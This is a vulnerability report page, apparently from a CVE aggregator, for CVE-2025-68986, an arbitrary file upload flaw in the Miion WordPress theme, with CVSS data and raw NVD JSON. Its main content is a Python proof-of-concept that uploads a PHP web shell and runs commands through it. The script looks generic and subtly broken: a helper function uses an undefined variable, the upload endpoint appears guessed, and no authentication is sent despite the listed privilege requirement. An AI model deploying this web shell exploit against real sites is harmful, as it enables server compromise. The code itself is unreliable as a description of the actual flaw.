Security Vulnerability Report
中文
CVE-2025-68986 CVSS 9.9 CRITICAL

CVE-2025-68986

Published: 2026-01-22 17:16:15
Last Modified: 2026-04-15 00:35:42

Description

Unrestricted Upload of File with Dangerous Type vulnerability in zozothemes Miion miion allows Upload a Web Shell to a Web Server.This issue affects Miion: from n/a through <= 1.2.7.

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Miion主题 <= 1.2.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-68986 PoC - Miion Theme Arbitrary File Upload # Target: WordPress site with Miion theme <= 1.2.7 def exploit_upload(target_url, webshell_path): """ Exploit arbitrary file upload vulnerability in Miion theme """ upload_url = f"{target_url}/wp-content/themes/miion/upload-handler.php" # Create malicious PHP webshell files = { 'file': ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php') } try: response = requests.post(upload_url, files=files, timeout=10) if response.status_code == 200: # Extract uploaded file path from response uploaded_path = extract_path(response.text) print(f"[+] File uploaded successfully!") print(f"[+] Access webshell at: {uploaded_path}") # Verify exploitation cmd_url = f"{uploaded_path}?cmd=whoami" verify = requests.get(cmd_url, timeout=10) if verify.status_code == 200: print(f"[+] Exploitation verified! Command output: {verify.text}") return True else: print(f"[-] Upload failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False def extract_path(response_text): """Extract uploaded file path from server response""" # Parse response to get actual file path import re match = re.search(r'(wp-content/themes/miion/[^\s"]+\.php)', response_text) return target_url + '/' + match.group(1) if match else None if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python exploit.py <target_url>") sys.exit(1) target = sys.argv[1] exploit_upload(target, 'shell.php')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68986", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:15.483", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unrestricted Upload of File with Dangerous Type vulnerability in zozothemes Miion miion allows Upload a Web Shell to a Web Server.This issue affects Miion: from n/a through <= 1.2.7."}, {"lang": "es", "value": "Vulnerabilidad de carga irrestricta de archivo con tipo peligroso en zozothemes Miion miion permite cargar un shell web a un servidor web. Este problema afecta a Miion: desde n/a hasta &lt;= 1.2.7."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.9, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.1, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/miion/vulnerability/wordpress-miion-theme-1-2-7-arbitrary-file-upload-vulnerability?_s_id=cve", "source": "[email protected]"}]}}